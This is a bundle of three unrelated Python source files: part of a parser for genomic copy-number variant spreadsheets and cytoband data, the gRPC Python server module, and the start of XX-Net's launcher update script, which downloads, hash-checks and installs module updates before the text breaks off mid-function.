elif head[cell.col_idx] == 'gender':
if cell.value and cell.value.find(u"男") != -1:
data['gender'] = 1
elif cell.value and cell.value.find(u"女") != -1:
data['gender'] = 0
elif not cell.value:
if self.debug: print "%s lack of gender" % name
else:
raise Exception("%s name's gender is %s: can not parse" % name, cell.value)
elif head[cell.col_idx] == 'location':
if cell.value:
(data['chr'], pos) = cell.value.encode().replace("chr","").split(":")
(data['start'], data['end']) = list(map(int, pos.split("-")))
else:
if self.debug: print "%s lack of 位置" % name
data['chr'] = "";data['end'] = 0;data['start'] = 0
elif head[cell.col_idx] == 'gainloss':
if not cell.value:
if self.debug: print "%s lack of 突变类型" % name
elif cell.value.find(u"重复") != -1:
data['gainloss'] = 'gain'
elif cell.value.find(u"缺失") != -1:
data['gainloss'] = 'loss'
else:
raise Exception("%s type is %s: can not parser" % name, cell.value)
elif head[cell.col_idx] == 'pmid':
if not cell.value:
if self.debug: print "%s lack of PMID号" % name
else:
data['pmid'] = str(cell.value).split("/")
elif head[cell.col_idx] == 'have_fulltext':
if not cell.value:
if self.debug: print "%s lack of 全文判读" % name
else:
data['have_fulltext'] = True if cell.value.find(u"有") != -1 else False
else:
raise Exception("%s遗漏了一个域%s" % (name, head[cell.col_idx]))
self.data.append(data)
return self.data
class ParseCytoband(object):
def __init__(self, fp, debug=False):
if not os.path.exists(fp): raise Exception("%s not exists" % fp)
self.filename = fp
self.debug = debug
self.parser_cytoband()
def parser_cytoband(self):
if self.debug: print "Parsing filename: %s" % self.filename
self.cytobands = []
with open(self.filename) as f:
for line in f:
items = line.rstrip().split("\t")
one = {'chrom': items[0], 'start': int(items[1]), 'end': int(items[2]),
'name': items[3], 'description': items[4], 'chr': items[0].replace('chr',"")}
self.cytobands.append(one)
def myreadlines(f, newline):
buf = ""
while True:
while newline in buf:
pos = buf.index(newline)
yield buf[:pos]
buf = buf[pos + len(newline):]
chunk = f.read(4096)
if not chunk:
yield buf
break
buf += chunk
def debugprint(text):
print "*"*60
print text;
print "#"*60
|
_server.py
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Service-side implementation of gRPC Python."""
import collections
import enum
import logging
import threading
import time
import grpc
from grpc import _common
from grpc._cython import cygrpc
from grpc.framework.foundation import callable_util
_SHUTDOWN_TAG = 'shutdown'
_REQUEST_CALL_TAG = 'request_call'
_RECEIVE_CLOSE_ON_SERVER_TOKEN = 'receive_close_on_server'
_SEND_INITIAL_METADATA_TOKEN = 'send_initial_metadata'
_RECEIVE_MESSAGE_TOKEN = 'receive_message'
_SEND_MESSAGE_TOKEN = 'send_message'
_SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN = (
'send_initial_metadata * send_message')
_SEND_STATUS_FROM_SERVER_TOKEN = 'send_status_from_server'
_SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN = (
'send_initial_metadata * send_status_from_server')
_OPEN = 'open'
_CLOSED = 'closed'
_CANCELLED = 'cancelled'
_EMPTY_FLAGS = 0
_UNEXPECTED_EXIT_SERVER_GRACE = 1.0
def _serialized_request(request_event):
return request_event.batch_operations[0].received_message.bytes()
def _application_code(code):
cygrpc_code = _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE.get(code)
return cygrpc.StatusCode.unknown if cygrpc_code is None else cygrpc_code
def _completion_code(state):
if state.code is None:
return cygrpc.StatusCode.ok
else:
return _application_code(state.code)
def _abortion_code(state, code):
if state.code is None:
return code
else:
return _application_code(state.code)
def _details(state):
return b'' if state.details is None else state.details
class _HandlerCallDetails(
collections.namedtuple('_HandlerCallDetails', (
'method', 'invocation_metadata',)), grpc.HandlerCallDetails):
pass
class _RPCState(object):
def __init__(self):
self.condition = threading.Condition()
self.due = set()
self.request = None
self.client = _OPEN
self.initial_metadata_allowed = True
self.disable_next_compression = False
self.trailing_metadata = None
self.code = None
self.details = None
self.statused = False
self.rpc_errors = []
self.callbacks = []
def _raise_rpc_error(state):
rpc_error = grpc.RpcError()
state.rpc_errors.append(rpc_error)
raise rpc_error
def _possibly_finish_call(state, token):
state.due.remove(token)
if (state.client is _CANCELLED or state.statused) and not state.due:
callbacks = state.callbacks
state.callbacks = None
return state, callbacks
else:
return None, ()
def _send_status_from_server(state, token):
def send_status_from_server(unused_send_status_from_server_event):
with state.condition:
return _possibly_finish_call(state, token)
return send_status_from_server
def _abort(state, call, code, details):
if state.client is not _CANCELLED:
effective_code = _abortion_code(state, code)
effective_details = details if state.details is None else state.details
if state.initial_metadata_allowed:
operations = (cygrpc.operation_send_initial_metadata(
_common.EMPTY_METADATA, _EMPTY_FLAGS),
cygrpc.operation_send_status_from_server(
_common.cygrpc_metadata(state.trailing_metadata),
effective_code, effective_details, _EMPTY_FLAGS),)
token = _SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN
else:
operations = (cygrpc.operation_send_status_from_server(
_common.cygrpc_metadata(state.trailing_metadata),
effective_code, effective_details, _EMPTY_FLAGS),)
token = _SEND_STATUS_FROM_SERVER_TOKEN
call.start_server_batch(
cygrpc.Operations(operations),
_send_status_from_server(state, token))
state.statused = True
state.due.add(token)
def _receive_close_on_server(state):
def receive_close_on_server(receive_close_on_server_event):
with state.condition:
if receive_close_on_server_event.batch_operations[
0].received_cancelled:
state.client = _CANCELLED
elif state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_CLOSE_ON_SERVER_TOKEN)
return receive_close_on_server
def _receive_message(state, call, request_deserializer):
def receive_message(receive_message_event):
serialized_request = _serialized_request(receive_message_event)
if serialized_request is None:
with state.condition:
if state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
else:
request = _common.deserialize(serialized_request,
request_deserializer)
with state.condition:
if request is None:
_abort(state, call, cygrpc.StatusCode.internal,
b'Exception deserializing request!')
else:
state.request = request
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
return receive_message
def _send_initial_metadata(state):
def send_initial_metadata(unused_send_initial_metadata_event):
with state.condition:
return _possibly_finish_call(state, _SEND_INITIAL_METADATA_TOKEN)
return send_initial_metadata
def _send_message(state, token):
def send_message(unused_send_message_event):
with state.condition:
state.condition.notify_all()
return _possibly_finish_call(state, token)
return send_message
class _Context(grpc.ServicerContext):
def __init__(self, rpc_event, state, request_deserializer):
self._rpc_event = rpc_event
self._state = state
self._request_deserializer = request_deserializer
def is_active(self):
with self._state.condition:
return self._state.client is not _CANCELLED and not self._state.statused
def time_remaining(self):
return max(
float(self._rpc_event.request_call_details.deadline) - time.time(),
0)
def cancel(self):
self._rpc_event.operation_call.cancel()
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def disable_next_message_compression(self):
with self._state.condition:
self._state.disable_next_compression = True
def invocation_metadata(self):
return _common.application_metadata(self._rpc_event.request_metadata)
def peer(self):
return _common.decode(self._rpc_event.operation_call.peer())
def send_initial_metadata(self, initial_metadata):
with self._state.condition:
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
else:
if self._state.initial_metadata_allowed:
operation = cygrpc.operation_send_initial_metadata(
_common.cygrpc_metadata(initial_metadata), _EMPTY_FLAGS)
self._rpc_event.operation_call.start_server_batch(
cygrpc.Operations((operation,)),
_send_initial_metadata(self._state))
self._state.initial_metadata_allowed = False
self._state.due.add(_SEND_INITIAL_METADATA_TOKEN)
else:
raise ValueError('Initial metadata no longer allowed!')
def set_trailing_metadata(self, trailing_metadata):
with self._state.condition:
self._state.trailing_metadata = _common.cygrpc_metadata(
trailing_metadata)
def set_code(self, code):
with self._state.condition:
self._state.code = code
def set_details(self, details):
with self._state.condition:
self._state.details = _common.encode(details)
class _RequestIterator(object):
def __init__(self, state, call, request_deserializer):
self._state = state
self._call = call
self._request_deserializer = request_deserializer
def _raise_or_start_receive_message(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif self._state.client is _CLOSED or self._state.statused:
raise StopIteration()
else:
self._call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_message(_EMPTY_FLAGS),)),
_receive_message(self._state, self._call,
self._request_deserializer))
self._state.due.add(_RECEIVE_MESSAGE_TOKEN)
def _look_for_request(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif (self._state.request is None and
_RECEIVE_MESSAGE_TOKEN not in self._state.due):
raise StopIteration()
else:
request = self._state.request
self._state.request = None
return request
def _next(self):
with self._state.condition:
self._raise_or_start_receive_message()
while True:
self._state.condition.wait()
request = self._look_for_request()
if request is not None:
return request
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def _unary_request(rpc_event, state, request_deserializer):
def unary_request():
with state.condition:
if state.client is _CANCELLED or state.statused:
return None
else:
start_server_batch_result = rpc_event.operation_call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_message(_EMPTY_FLAGS),)),
_receive_message(state, rpc_event.operation_call,
request_deserializer))
state.due.add(_RECEIVE_MESSAGE_TOKEN)
while True:
state.condition.wait()
if state.request is None:
if state.client is _CLOSED:
details = '"{}" requires exactly one request message.'.format(
rpc_event.request_call_details.method)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unimplemented,
_common.encode(details))
return None
elif state.client is _CANCELLED:
return None
else:
request = state.request
state.request = None
return request
return unary_request
def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
context = _Context(rpc_event, state, request_deserializer)
try:
return behavior(argument, context), True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception calling application: {}'.format(e)
logging.exception(details)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unknown, _common.encode(details))
return None, False
def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return next(response_iterator), True
except StopIteration:
return None, True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception iterating responses: {}'.format(e)
logging.exception(details)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unknown, _common.encode(details))
return None, False
def _serialize_response(rpc_event, state, response, response_serializer):
serialized_response = _common.serialize(response, response_serializer)
if serialized_response is None:
with state.condition:
_abort(state, rpc_event.operation_call, cygrpc.StatusCode.internal,
b'Failed to serialize response!')
return None
else:
return serialized_response
def _send_response(rpc_event, state, serialized_response):
with state.condition:
if state.client is _CANCELLED or state.statused:
return False
else:
if state.initial_metadata_allowed:
operations = (cygrpc.operation_send_initial_metadata(
_common.EMPTY_METADATA, _EMPTY_FLAGS),
cygrpc.operation_send_message(serialized_response,
_EMPTY_FLAGS),)
state.initial_metadata_allowed = False
token = _SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN
else:
operations = (cygrpc.operation_send_message(serialized_response,
_EMPTY_FLAGS),)
token = _SEND_MESSAGE_TOKEN
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(operations), _send_message(state, token))
state.due.add(token)
while True:
state.condition.wait()
if token not in state.due:
return state.client is not _CANCELLED and not state.statused
def _status(rpc_event, state, serialized_response):
with state.condition:
if state.client is not _CANCELLED:
trailing_metadata = _common.cygrpc_metadata(state.trailing_metadata)
code = _completion_code(state)
details = _details(state)
operations = [
cygrpc.operation_send_status_from_server(
trailing_metadata, code, details, _EMPTY_FLAGS),
]
if state.initial_metadata_allowed:
operations.append(
cygrpc.operation_send_initial_metadata(
_common.EMPTY_METADATA, _EMPTY_FLAGS))
if serialized_response is not None:
operations.append(
cygrpc.operation_send_message(serialized_response,
_EMPTY_FLAGS))
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(operations),
_send_status_from_server(state, _SEND_STATUS_FROM_SERVER_TOKEN))
state.statused = True
state.due.add(_SEND_STATUS_FROM_SERVER_TOKEN)
def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = _call_behavior(rpc_event, state, behavior, argument,
request_deserializer)
if proceed:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response_iterator, proceed = _call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
while True:
response, proceed = _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
if response is None:
_status(rpc_event, state, None)
break
else:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
proceed = _send_response(rpc_event, state,
serialized_response)
if not proceed:
break
else:
break
else:
break
def _handle_unary_unary(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
thread_pool.submit(_unary_response_in_pool, rpc_event, state,
method_handler.unary_unary, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_unary_stream(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
thread_pool.submit(_stream_response_in_pool, rpc_event, state,
method_handler.unary_stream, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_unary(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.operation_call,
method_handler.request_deserializer)
thread_pool.submit(_unary_response_in_pool, rpc_event, state,
method_handler.stream_unary, lambda: request_iterator,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_stream(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.operation_call,
method_handler.request_deserializer)
thread_pool.submit(_stream_response_in_pool, rpc_event, state,
method_handler.stream_stream, lambda: request_iterator,
method_handler.request_deserializer,
method_handler.response_serializer)
def _find_method_handler(rpc_event, generic_handlers):
for generic_handler in generic_handlers:
method_handler = generic_handler.service(
_HandlerCallDetails(
_common.decode(rpc_event.request_call_details.method),
rpc_event.request_metadata))
if method_handler is not None:
return method_handler
else:
return None
def _handle_unrecognized_method(rpc_event):
operations = (cygrpc.operation_send_initial_metadata(_common.EMPTY_METADATA,
_EMPTY_FLAGS),
cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),
cygrpc.operation_send_status_from_server(
_common.EMPTY_METADATA, cygrpc.StatusCode.unimplemented,
b'Method not found!', _EMPTY_FLAGS),)
rpc_state = _RPCState()
rpc_event.operation_call.start_server_batch(
operations, lambda ignored_event: (rpc_state, (),))
return rpc_state
def _handle_with_method_handler(rpc_event, method_handler, thread_pool):
state = _RPCState()
with state.condition:
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),)),
_receive_close_on_server(state))
state.due.add(_RECEIVE_CLOSE_ON_SERVER_TOKEN)
if method_handler.request_streaming:
if method_handler.response_streaming:
_handle_stream_stream(rpc_event, state, method_handler,
thread_pool)
else:
_handle_stream_unary(rpc_event, state, method_handler,
thread_pool)
else:
if method_handler.response_streaming:
_handle_unary_stream(rpc_event, state, method_handler,
thread_pool)
else:
_handle_unary_unary(rpc_event, state, method_handler,
thread_pool)
return state
def _handle_call(rpc_event, generic_handlers, thread_pool):
if not rpc_event.success:
return None
if rpc_event.request_call_details.method is not None:
method_handler = _find_method_handler(rpc_event, generic_handlers)
if method_handler is None:
return _handle_unrecognized_method(rpc_event)
else:
return _handle_with_method_handler(rpc_event, method_handler,
thread_pool)
else:
return None
@enum.unique
class _ServerStage(enum.Enum):
STOPPED = 'stopped'
STARTED = 'started'
GRACE = 'grace'
class _ServerState(object):
def __init__(self, completion_queue, server, generic_handlers, thread_pool):
self.lock = threading.Lock()
self.completion_queue = completion_queue
self.server = server
self.generic_handlers = list(generic_handlers)
self.thread_pool = thread_pool
self.stage = _ServerStage.STOPPED
self.shutdown_events = None
# TODO(https://github.com/grpc/grpc/issues/6597): eliminate these fields.
self.rpc_states = set()
self.due = set()
def _add_generic_handlers(state, generic_handlers):
with state.lock:
state.generic_handlers.extend(generic_handlers)
def _add_insecure_port(state, address):
with state.lock:
return state.server.add_http2_port(address)
def _add_secure_port(state, address, server_credentials):
with state.lock:
return state.server.add_http2_port(address,
server_credentials._credentials)
def _request_call(state):
state.server.request_call(state.completion_queue, state.completion_queue,
_REQUEST_CALL_TAG)
state.due.add(_REQUEST_CALL_TAG)
# TODO(https://github.com/grpc/grpc/issues/6597): delete this function.
def _stop_serving(state):
if not state.rpc_states and not state.due:
for shutdown_event in state.shutdown_events:
shutdown_event.set()
state.stage = _ServerStage.STOPPED
return True
else:
return False
def _serve(state):
while True:
event = state.completion_queue.poll()
if event.tag is _SHUTDOWN_TAG:
with state.lock:
state.due.remove(_SHUTDOWN_TAG)
if _stop_serving(state):
return
elif event.tag is _REQUEST_CALL_TAG:
with state.lock:
state.due.remove(_REQUEST_CALL_TAG)
rpc_state = _handle_call(event, state.generic_handlers,
state.thread_pool)
if rpc_state is not None:
state.rpc_states.add(rpc_state)
if state.stage is _ServerStage.STARTED:
_request_call(state)
elif _stop_serving(state):
return
else:
rpc_state, callbacks = event.tag(event)
for callback in callbacks:
callable_util.call_logging_exceptions(
callback, 'Exception calling callback!')
if rpc_state is not None:
with state.lock:
state.rpc_states.remove(rpc_state)
if _stop_serving(state):
return
def _stop(state, grace):
with state.lock:
if state.stage is _ServerStage.STOPPED:
shutdown_event = threading.Event()
shutdown_event.set()
return shutdown_event
else:
if state.stage is _ServerStage.STARTED:
state.server.shutdown(state.completion_queue, _SHUTDOWN_TAG)
state.stage = _ServerStage.GRACE
state.shutdown_events = []
state.due.add(_SHUTDOWN_TAG)
shutdown_event = threading.Event()
state.shutdown_events.append(shutdown_event)
if grace is None:
state.server.cancel_all_calls()
# TODO(https://github.com/grpc/grpc/issues/6597): delete this loop.
for rpc_state in state.rpc_states:
with rpc_state.condition:
rpc_state.client = _CANCELLED
rpc_state.condition.notify_all()
else:
def cancel_all_calls_after_grace():
shutdown_event.wait(timeout=grace)
with state.lock:
state.server.cancel_all_calls()
# TODO(https://github.com/grpc/grpc/issues/6597): delete this loop.
for rpc_state in state.rpc_states:
with rpc_state.condition:
rpc_state.client = _CANCELLED
rpc_state.condition.notify_all()
thread = threading.Thread(target=cancel_all_calls_after_grace)
thread.start()
return shutdown_event
shutdown_event.wait()
return shutdown_event
def _start(state):
with state.lock:
if state.stage is not _ServerStage.STOPPED:
raise ValueError('Cannot start already-started server!')
state.server.start()
state.stage = _ServerStage.STARTED
_request_call(state)
def cleanup_server(timeout):
if timeout is None:
_stop(state, _UNEXPECTED_EXIT_SERVER_GRACE).wait()
else:
_stop(state, timeout).wait()
thread = _common.CleanupThread(
cleanup_server, target=_serve, args=(state,))
thread.start()
class Server(grpc.Server):
def __init__(self, thread_pool, generic_handlers, options):
completion_queue = cygrpc.CompletionQueue()
server = cygrpc.Server(_common.channel_args(options))
server.register_completion_queue(completion_queue)
self._state = _ServerState(completion_queue, server, generic_handlers,
thread_pool)
def add_generic_rpc_handlers(self, generic_rpc_handlers):
_add_generic_handlers(self._state, generic_rpc_handlers)
def add_insecure_port(self, address):
return _add_insecure_port(self._state, _common.encode(address))
def add_secure_port(self, address, server_credentials):
return _add_secure_port(self._state,
_common.encode(address), server_credentials)
def start(self):
_start(self._state)
def stop(self, grace):
return _stop(self._state, grace)
def __del__(self):
_stop(self._state, None)
|
update.py
|
#!/usr/bin/env python
# coding:utf-8
import os
import json
import time
import threading
import zipfile
import sys
import platform
import uuid
from distutils.version import LooseVersion
from xlog import getLogger
xlog = getLogger("launcher")
import config
import update_from_github
import urllib2
try:
reduce # Python 2
except NameError: # Python 3
from functools import reduce
update_url = "https://xxnet-update.appspot.com/update.json"
update_content = ""
update_dict = {}
new_gae_proxy_version = ""
gae_proxy_path = ""
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath(os.path.join(current_path, os.pardir))
data_root = os.path.abspath(os.path.join(root_path, os.pardir, os.pardir, 'data'))
def get_opener():
autoproxy = '127.0.0.1:8087'
import ssl
if getattr(ssl, "create_default_context", None):
cafile = os.path.join(data_root, "gae_proxy", "CA.crt")
if not os.path.isfile(cafile):
cafile = None
context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH,
cafile=cafile)
https_handler = urllib2.HTTPSHandler(context=context)
opener = urllib2.build_opener(urllib2.ProxyHandler({'http': autoproxy, 'https': autoproxy}), https_handler)
else:
opener = urllib2.build_opener(urllib2.ProxyHandler({'http': autoproxy, 'https': autoproxy}))
return opener
def version_to_bin(s):
return reduce(lambda a, b: a << 8 | b, map(int, s.split(".")))
def download_file(url, file):
try:
xlog.info("download %s to %s", url, file)
opener = get_opener()
req = opener.open(url, cafile="")
CHUNK = 16 * 1024
with open(file, 'wb') as fp:
while True:
chunk = req.read(CHUNK)
if not chunk: break
fp.write(chunk)
return True
except:
xlog.info("download %s to %s fail", url, file)
return False
def sha1_file(filename):
import hashlib
BLOCKSIZE = 65536
hasher = hashlib.sha1()
try:
with open(filename, 'rb') as afile:
buf = afile.read(BLOCKSIZE)
while len(buf) > 0:
hasher.update(buf)
buf = afile.read(BLOCKSIZE)
return hasher.hexdigest()
except:
return False
def install_module(module, new_version):
import module_init
import os, subprocess, sys
current_path = os.path.dirname(os.path.abspath(__file__))
new_module_version_path = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir, module, new_version))
# check path exist
if not os.path.isdir(new_module_version_path):
xlog.error("install module %s dir %s not exist", module, new_module_version_path)
return
# call setup.py
setup_script = os.path.join(new_module_version_path, "setup.py")
if not os.path.isfile(setup_script):
xlog.warn("update %s fail. setup script %s not exist", module, setup_script)
return
config.set(["modules", module, "current_version"], str(new_version))
config.save()
if module == "launcher":
module_init.stop_all()
import web_control
web_control.stop()
subprocess.Popen([sys.executable, setup_script], shell=False)
os._exit(0)
else:
xlog.info("Setup %s version %s ...", module, new_version)
try:
module_init.stop(module)
subprocess.call([sys.executable, setup_script], shell=False)
xlog.info("Finished new version setup.")
xlog.info("Restarting new version ...")
module_init.start(module)
except Exception as e:
xlog.error("install module %s %s fail:%s", module, new_version, e)
def download_module(module, new_version):
import os
global update_content, update_dict
current_path = os.path.dirname(os.path.abspath(__file__))
download_path = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir, 'data', 'downloads'))
if not os.path.isdir(download_path):
os.mkdir(download_path)
try:
for source in update_dict["modules"][module]["versions"][new_version]["sources"]:
url = source["url"]
filename = module + "-" + new_version + ".zip"
file_path = os.path.join(download_path, filename)
if os.path.isfile(file_path) and sha1_file(file_path) == update_dict["modules"][module]["versions"][new_version]["sha1"]:
pass
elif not download_file(url, file_path):
xlog.warn("download %s fail", url)
continue
sha1 = sha1_file(file_path)
if update_dict["modules"][module]["versions"][new_version]["sha1"] != sha1:
xlog.warn("download %s sha1 wrong", url)
continue
module_path = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir, module))
if not os.path.isdir(module_path):
os.path.mkdir(module_path, "755")
version_path = os.path.join(module_path, new_version)
if os.path.isdir(version_path):
xlog.error("module dir exist:%s, download exist.", version_path)
return
with zipfile.ZipFile(file_path, "r") as dz:
dz.extractall(module_path)
dz.close()
import shutil
unzip_path = os.path.abspath(os.path.join(module_path, module + "-" + new_version))
tag_path = os.path.abspath(os.path.join(module_path, new_version))
shutil.move(unzip_path, tag_path)
msg = "Module %s new version %s downloaded, Install?" % (module, new_version)
if sys.platform == "linux" or sys.platform == "linux2":
from gtk_tray import sys_tray
data_install = "%s|%s|install" % (module, new_version)
data_ignore = "%s|%s|ignore" % (module, new_version)
buttons = {1: {"data": data_install, "label": "Install", 'callback': general_gtk_callback},
2: {"data": data_ignore, "label": "Ignore", 'callback': general_gtk_callback}}
sys_tray.notify_general(msg=msg, title="Install", buttons=buttons)
elif sys.platform == "win32":
from win_tray import sys_tray
if sys_tray.dialog_yes_no(msg, u"Install", None, None) == 1:
install_module(module, new_version)
else:
ignore_module(module, new_version)
elif sys.platform == "darwin":
from mac_tray import sys_tray
if sys_tray.presentAlert_withTitle_(msg, "Install"):
install_module(module, new_version)
else:
ignore_module(module, new_version)
else:
install_module(module, new_version)
break
except Exception as e:
xlog.warn("get gae_proxy source fail, content:%s err:%s", update_content, e)
def ignore_module(module, new_version):
config.set(["modules", module, "ignore_version"], str(new_version))
config.save()
def general_gtk_callback(widget=None, data=None):
args = data.split('|')
if len(args) != 3:
xlog.error("general_gtk_callback data:%s", data)
return
module = args[0]
new_version = args[1]
action = args[2]
if action == "download":
download_module(module, new_version)
elif action == "install":
install_module(module, new_version)
elif action == "ignore":
ignore_module(module, new_version)
def check_update():
try:
if update_from_github.update_info == "dont-check":
return
check_push_update()
update_rule = config.get(["update", "check_update"], "notice-stable")
if update_rule not in ("stable", "notice-stable", "test", "notice-test"):
return
versions = update_from_github.get_github_versions()
current_version = update_from_github.current_version()
test_version, stable_version = versions[0][1], versions[1][1]
if test_version != config.get(["update", "skip_test_version"]):
if update_rule == "notice-test":
if LooseVersion(current_version) < LooseVersion(test_version):
xlog.info("checked new test version %s", test_version)
update_from_github.update_info = '{"type":"test", "version":"%s"}' % test_version
elif update_rule == "test":
if LooseVersion(current_version) < LooseVersion(test_version):
xlog.info("update to test version %s", test_version)
update_from_github.update_version(test_version)
if stable_version != config.get(["update", "skip_stable_version"]):
if update_rule == "notice-stable":
if LooseVersion(current_version) < LooseVersion(stable_version):
xlog.info("checked new stable version %s", stable_version)
update_from_github.update_info = '{"type":"stable", "version":"%s"}' % stable_version
elif update_rule == "stable":
if LooseVersion(current_version) < LooseVersion(stable_version):
xlog.info("update to stable version %s", stable_version)
update_from_github.update_version(stable_version)
except IOError as e:
xlog.warn("check update fail:%r", e)
except Exception as e:
xlog.exception("check_update fail:%r", e)
finally:
if update_from_github.update_info == "init":
update_from_github.update_info = ""
def check_push_update():
global update_content, update_dict
try:
opener = get_opener()
req_url = update_url + "?uuid=" + get_uuid() \
+ "&version=" + update_from_github.current_version() \
+ "&platform=" + platform.platform()
try:
update_content = opener.open(req_url).read()
except Exception as e:
xlog.warn("check_update fail:%r", e)
return False
update_dict = json.loads(update_content)
return True
for module in update_dict["modules"]:
new_version = str(update_dict["modules"][module]["last_version"])
describe = update_dict["modules"][module]["versions"][new_version]["describe"]
if update_dict["modules"][module]["versions"][new_version]["notify"] != "true":
continue
if not module in config.config["modules"]:
ignore_version = 0
current_version = 0
config.config["modules"][module] = {}
config.config["modules"][module]["current_version"] = '0.0.0'
else:
current_version = config.get(["modules", module, "current_version"])
if "ignore_version" in config.config["modules"][module]:
ignore_version = config.config["modules"][module]["ignore_version"]
else:
ignore_version = current_version
if version_to_bin(new_version) <= version_to_bin(ignore_version):
continue
if version_to_bin(new_version) > version_to_bin(current_version):
xlog.info("new %s version:%s", module, new_version)
if sys.platform == "linux" or sys.platform == "linux2":
from gtk_tray import sys_tray
msg = "Module %s new version: %s, Download?\nNew:%s" % (module, new_version, describe)
data_download = "%s|%s|download" % (module, new_version)
data_ignore = "%s|%s|ignore" % (module, new_version)
buttons = {1: {"data": data_download, "label": "Download", 'callback': general_gtk_callback},
2: {"data": data_ignore, "label": "Ignore", 'callback': general_gtk_callback}}
sys_tray.notify_general(msg=msg, title="New Version", buttons=buttons)
elif sys.platform == "win32":
from win_tray import sys_tray
msg = "Module %s new version: %s, Download?" % (module, new_version)
if sys_tray.dialog_yes_no(msg, u"Download", None, None) == 1:
download_module(module, new_version)
else:
ignore_module(module, new_version)
elif sys.platform == "darwin":
from mac_tray import sys_tray
msg = "Module %s new version: %s, Download?" % (module, new_version)
if sys_tray.presentAlert_withTitle_(msg, "Download"):
download_module(module, new_version)
else:
ignore_module(module, new_version)
else:
download_module(module, new_version)
except Exception as e:
xlog.exception("check_update except:%s", e)
return
def create_desktop_shortcut():
import sys
import subprocess
work_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(work_path)
if sys.platform.startswith("linux"):
if os.getenv("DESKTOP_SESSION", "unknown") != "unknown": # make sure this is desktop linux
xxnet_path = os.path.abspath(os.path.join(root_path, os.pardir, os.pardir))
cmd = 'env XXNETPATH="' + xxnet_path + '" "' + work_path + '/create_shortcut_linux.sh"'
os.system(cmd)
elif sys.platform == "win32":
# import ctypes
